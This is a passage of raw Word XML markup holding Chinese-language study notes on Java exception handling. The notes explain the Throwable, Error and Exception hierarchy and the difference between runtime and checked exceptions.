        </w:rPr>
        <w:t xml:space="preserve">  Java</w:t>
      </w:r>
      <w:r w:rsidR="00115125" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>异常处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>把异常当作对象来处理，并定义一个基类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java.lang.Throwable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>作为所有异常的超类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Thorwable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类所有异常和错误的超类，有两个子类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Exceptio</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，分别表示错误和异常。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>其中异常类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>又分为运行时异常</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(RuntimeException</w:t>
      </w:r>
      <w:r w:rsidR="00000635">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00000635" w:rsidRPr="00000635">
        <w:rPr>
          <w:rStyle w:val="1Char"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00000635">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>非受检异常</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和非运行时异常</w:t>
      </w:r>
      <w:r w:rsidR="00904455">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00904455">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>受检异常</w:t>
      </w:r>
      <w:r w:rsidR="00904455">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00904455">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是程序无法处理的错误，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ThreadDeath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等。这些异常发生时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>虚拟机（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）一般会选择线程终止。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是程序本身可以处理的异常</w:t>
      </w:r>
      <w:r w:rsidR="0037000F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>运行时异常</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>都是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RuntimeException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类及其子类异常，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NullPointerException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IndexOutOfBoundsException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等，这些异常是不检查异常，程序中可以选择捕获处理，也可以不处理。这些异常一般是由程序逻辑错误引起的，程序应该从逻辑角度尽可能避免这类异常的发生。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NullPointerException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ArrayIndexOutOfBoundException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ClassCastException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00715AE4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>非运行时异常</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RuntimeException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以外的异常，类型上都属于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类及其子类。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从程序语法角度讲是必须进行处理的异常，如果不处理，程序就不能编译通过。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IOException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQLException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等以及用户自定义的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异常，一般情况下不自定义检查异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
